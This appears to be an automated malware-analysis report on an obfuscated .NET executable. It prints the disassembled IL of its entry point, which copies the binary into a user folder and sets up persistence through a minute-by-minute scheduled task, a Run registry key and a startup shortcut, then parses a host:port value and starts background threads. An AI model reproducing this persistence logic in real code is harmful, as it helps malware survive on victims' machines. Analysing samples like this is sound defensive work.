Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	425
Main Method	System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::74biDWXE8NcKCh4bwDoNM4yD7Tx4i1dZvwiTMkjaHI4VFMvIjANEnjIbhqc3eEiwzrMiXDFWG2CLyg5Cd32fIeHPXpM()
Main IL Instruction Count	344
Main IL	ldsfld System.Int32 Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::7f9VlPVq9UpuRvRxCztpGTde7TqHCXuldueGgeq8RA3xpMJ4JtisEZ53lG5emXrrHXrGxPUF8Mzi3T6fZua5RFEsGKH ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::HONjflZcSWbFWM0pPSqJKBDdI7sh1UgOuayzwLv6ZoR7mF2nlfdM831psjOAHGIQU7KANVvmbYe4y2g1IQojmQisR1O call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::HONjflZcSWbFWM0pPSqJKBDdI7sh1UgOuayzwLv6ZoR7mF2nlfdM831psjOAHGIQU7KANVvmbYe4y2g1IQojmQisR1O ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::Wzhbvw526YCfEZ8tYNlbIeXIUxxDxSZMGOTLWSAATJwNl2ksLQz22mUIgtFakME01GkKdREg1duf0PUOuDyRUZiZWNU call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::Wzhbvw526YCfEZ8tYNlbIeXIUxxDxSZMGOTLWSAATJwNl2ksLQz22mUIgtFakME01GkKdREg1duf0PUOuDyRUZiZWNU ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::hkdrezDhgQhX5rrrVw2ka8abuGLv1qiJ12EUY9Yp3ywXZib6j5mEm1HH4KSQPsZ1GiiNIlYSDSUc6wi0ASIjn0DWJSR call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::hkdrezDhgQhX5rrrVw2ka8abuGLv1qiJ12EUY9Yp3ywXZib6j5mEm1HH4KSQPsZ1GiiNIlYSDSUc6wi0ASIjn0DWJSR ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::gmHojifPVQqebQBgFmt90cZKeF9l3XtvAwkNFcvY1gy0cGLKEbFQDqWJCMoamjE9808N9VO36Vk3ByCkC3BJyyEgaed call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::gmHojifPVQqebQBgFmt90cZKeF9l3XtvAwkNFcvY1gy0cGLKEbFQDqWJCMoamjE9808N9VO36Vk3ByCkC3BJyyEgaed ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::wS1zfwPUPhMiTNaYQeOkJqIUzlAWPihJAmEoSokV8FdQ8FSjCzjZXsz4Ix16iny8ke1d1vNtp9Rn8zCYmb9agpdPIWy call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::wS1zfwPUPhMiTNaYQeOkJqIUzlAWPihJAmEoSokV8FdQ8FSjCzjZXsz4Ix16iny8ke1d1vNtp9Rn8zCYmb9agpdPIWy ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::ArU2nAq3FwPiD3UH49k49xB0pvWqGmls7nLTW6FLIqlws76KEMY8QoQME6GNx4gE3xUksjY1iZJHdNFhtZo4PDzY7pG call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::ArU2nAq3FwPiD3UH49k49xB0pvWqGmls7nLTW6FLIqlws76KEMY8QoQME6GNx4gE3xUksjY1iZJHdNFhtZo4PDzY7pG ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs leave.s IL_00B8: call System.Boolean Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::Mx1HZDtf8NIZkCWXj6kc7sx87Qb2Sqv4q() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00B8: call System.Boolean Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::Mx1HZDtf8NIZkCWXj6kc7sx87Qb2Sqv4q() call System.Boolean Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::Mx1HZDtf8NIZkCWXj6kc7sx87Qb2Sqv4q() brtrue.s IL_00C5: call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::ckhAgHg7ZpboZ28k38ECJLaGJ25nU5KlPfPOAPa1tlRugrI3EXSvelw32j7LSYt0UTHU456RBiaAdGSfA3HB8dyMZJ4() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::ckhAgHg7ZpboZ28k38ECJLaGJ25nU5KlPfPOAPa1tlRugrI3EXSvelw32j7LSYt0UTHU456RBiaAdGSfA3HB8dyMZJ4() leave.s IL_00DB: call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::GMlGOTpruXihcNR9H7xQLfXrbMTDati5QPGPwwJC9umhiqUA3UzJRmRv5dYEB6sBztvzQBZCibct0CWSjlc8ded6kwJ() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00DB: call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::GMlGOTpruXihcNR9H7xQLfXrbMTDati5QPGPwwJC9umhiqUA3UzJRmRv5dYEB6sBztvzQBZCibct0CWSjlc8ded6kwJ() call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::GMlGOTpruXihcNR9H7xQLfXrbMTDati5QPGPwwJC9umhiqUA3UzJRmRv5dYEB6sBztvzQBZCibct0CWSjlc8ded6kwJ() ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::ArU2nAq3FwPiD3UH49k49xB0pvWqGmls7nLTW6FLIqlws76KEMY8QoQME6GNx4gE3xUksjY1iZJHdNFhtZo4PDzY7pG ldstr \ ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_6 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0122: ldloc.1 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0139: ldc.i4 1000 ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldsfld System.String Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::K836Iz2IpzFQ3VJfQCcdB1oiDCQs38iDq call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0164: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0164: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_10 ldloc.s V_10 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.NsPne3WCStWJ4WTbvkhFNgwgfYpa7ATQzUJa6fzHeEc22obkBKX2KmEIh8V8t72KQAI4kvLIPqgPafd9rX0BYkZX15w::E9vHUillQxupiTvNewUoLSq0UGbsQB9NY() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_01CA: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_020E: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_10 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_022F: call My.brgI9QdS4DlJlHEENYt5jh2db1sh4fWMxnCWNrTbf585kSDXUqG6ZPQtrcuNn5cI2j77z07MomPR4mJmLxoFPySX4ke My.zgyJSc2EVbeTRHTwgCNT7y5DMbHdcv6Xcndmc2OvLIYzBwnOgOisz0zyfBT41ggUD738oNRFEBewFzh1aZW4OYIC28m::5qCxAblA9CATjJ1CSluejwteLiLkC2NN6ppAXesEwDWkMOJ12DrJJh1sYKB04PHT59NHA1LwlwDb2F0VxPD89ZD4k30() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_022F: call My.brgI9QdS4DlJlHEENYt5jh2db1sh4fWMxnCWNrTbf585kSDXUqG6ZPQtrcuNn5cI2j77z07MomPR4mJmLxoFPySX4ke My.zgyJSc2EVbeTRHTwgCNT7y5DMbHdcv6Xcndmc2OvLIYzBwnOgOisz0zyfBT41ggUD738oNRFEBewFzh1aZW4OYIC28m::5qCxAblA9CATjJ1CSluejwteLiLkC2NN6ppAXesEwDWkMOJ12DrJJh1sYKB04PHT59NHA1LwlwDb2F0VxPD89ZD4k30() call My.brgI9QdS4DlJlHEENYt5jh2db1sh4fWMxnCWNrTbf585kSDXUqG6ZPQtrcuNn5cI2j77z07MomPR4mJmLxoFPySX4ke My.zgyJSc2EVbeTRHTwgCNT7y5DMbHdcv6Xcndmc2OvLIYzBwnOgOisz0zyfBT41ggUD738oNRFEBewFzh1aZW4OYIC28m::5qCxAblA9CATjJ1CSluejwteLiLkC2NN6ppAXesEwDWkMOJ12DrJJh1sYKB04PHT59NHA1LwlwDb2F0VxPD89ZD4k30() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.1 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_026A: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_026A: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_13 stelem.ref <null> ldloc.s V_16 stloc.s V_17 ldloc.s V_17 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_18 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_18 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_02EF: stloc.s V_19 ldloc.s V_17 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_13 stloc.s V_19 ldloc.s V_19 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_19 ldloc.s V_13 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::RKzoPsXZ95xNymvHpqGHvL9bE4rTX67xQ leave.s IL_036E: call System.Void Stub.6oIsYNH7YLu1mf0Ds8fGzVQwEmZ5vy1pO::yMuKB9zRC7eQeCmUCwSCubToq8LtGTcGu() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_036E: call System.Void Stub.6oIsYNH7YLu1mf0Ds8fGzVQwEmZ5vy1pO::yMuKB9zRC7eQeCmUCwSCubToq8LtGTcGu() call System.Void Stub.6oIsYNH7YLu1mf0Ds8fGzVQwEmZ5vy1pO::yMuKB9zRC7eQeCmUCwSCubToq8LtGTcGu() ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::wS1zfwPUPhMiTNaYQeOkJqIUzlAWPihJAmEoSokV8FdQ8FSjCzjZXsz4Ix16iny8ke1d1vNtp9Rn8zCYmb9agpdPIWy call System.String Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::MIJkicHssbId8zxxWhDY5bMMDBz9E5QzMvo58rzIVszw9P1gtyB6yMaR8feZ8XjY3rznTwgDOLCfBtYEfoQGYC1Escw(System.String) stloc.0 <null> ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::c7KqcwIjj5ICzlI71DWewMgBj1eGUFDJRYou5cvQmDZyunchfeGqbFNzUbP3t6jlcIcJ99dwF1dJhpZBejDLIJiXx0Z ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.1 <null> ldelem.ref <null> stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::sOBxiihlzFki1tbWcXT45CxGquqQhR06aDXT7B3tO4sQI0wG8ztWPN0PdRWMziUNgVjakWeaPuzIwdqudnaHxxsw40D call System.Void Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::WsXqT6gvOmPThQ1oZb2c5htarIxgWoM8K() ldnull <null> ldftn System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::sdQZvUVCFa8yN7k86LSCNYxT6yLrGPr8IlfcUbfViItdB67jrr6LaOPW3MuKM5o5m4pd2V2YXew9Z6bPKzTqErNCkb5() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.NsPne3WCStWJ4WTbvkhFNgwgfYpa7ATQzUJa6fzHeEc22obkBKX2KmEIh8V8t72KQAI4kvLIPqgPafd9rX0BYkZX15w::E9vHUillQxupiTvNewUoLSq0UGbsQB9NY() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_03E4: ldnull call System.Void Stub.W5qeFpzecLwAmrsbEIEcPD6XuFoISgnD3::3eRo4z0Ev3ppHvZ5zZCVkE1TnVieq6owl() ldnull <null> ldftn System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::5xPHRRcl8TXrwotEBNeqceyzTNhsU8ghNLsprOMVuwrSu0CVdNx2BxK0ZHpjgiezTm8hSY80UFQ8k5a5QzMqgQ5YpUs() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldnull <null> ldftn System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::HQ5erjX77n16I154Wk8nUYigTxdUd0gKLqeTzwvoXMVto4e6ahaY02R8ay2wBLs8v9vXvSLtfsSjV9j2lHXOaHrfSIs() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.3 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>

527c890f4d698b818458df611bb0f88c (71.17 KB)

File Structure

Characteristics

No malware configuration were found at this point.

You must be signed in to post a comment.

527c890f4d698b818458df611bb0f88c

PE Executable | MD5: 527c890f4d698b818458df611bb0f88c | Size: 71.17 KB | application/x-dosexec

PE Executable
|
MD5: 527c890f4d698b818458df611bb0f88c
|
Size: 71.17 KB
|
application/x-dosexec